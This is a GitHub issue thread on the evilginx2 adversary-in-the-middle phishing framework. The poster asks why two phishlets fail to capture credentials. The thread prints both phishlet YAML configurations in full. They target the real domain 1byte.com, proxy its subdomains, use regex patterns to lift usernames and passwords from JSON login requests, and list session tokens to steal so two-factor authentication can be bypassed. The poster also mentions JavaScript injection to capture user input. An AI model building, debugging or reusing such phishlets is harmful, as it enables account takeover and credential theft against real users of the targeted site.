kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication

Evilginx ver 3.3.0 cannot capture credentials

alasalamont opened this issue · comments

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hi all,
I am using Evilginx 3.3.0 and testing it against the domain 1byte.com, but I cannot catch the credentials.

  • Here is the POST request. The site uses JSON format, therefore the type in credentials must be json.

  • Here are the cookies stored in the browser. The needed cookies are auth._token_expiration.local and auth._token.local.

  • I did try to test the regular expression for catching the values of username + password. It works.

  • And here is my 1st phishlet, which did not work :(


min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['auth.token_expiration.local:always', 'auth._token.local:always']
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

  • For the second phishlet, I specified all the domains correctly, but I encountered an issue with setting the value of auth_urls. The landing page is 1byte.com, but after logging in, the user dashboard uses bo.1byte.com and the content is retrieved from api.1byte.com. Since I set 1byte.com as the landing page in the proxy host, there's no way to instruct Evilginx to check api.1byte.com using the auth_urls after the login.

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['.*:regexp']
  - domain: '1byte.com'
    keys: ['.*:regexp']  
  - domain: '.api.1byte.com'
    keys: ['.*:regexp']
  - domain: 'api.1byte.com'
    keys: ['.*:regexp']
auth_urls:
  - '/'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

Another option is to inject JavaScript to capture what the user inputs, but that's not what I'm aiming for. I just want to know if the way I've built the phishlet is correct or not. If it's wrong, where exactly is the issue? Or are there certain cases where Evilginx can't capture credentials without injecting JavaScript?

Thanks!!!

I am trying to reproduce your issue, but how did you manage to get evilginx and Burp Suite to work together?
I get "Cannot read TLS response from mitm'd server proxyconnect tcp: EOF".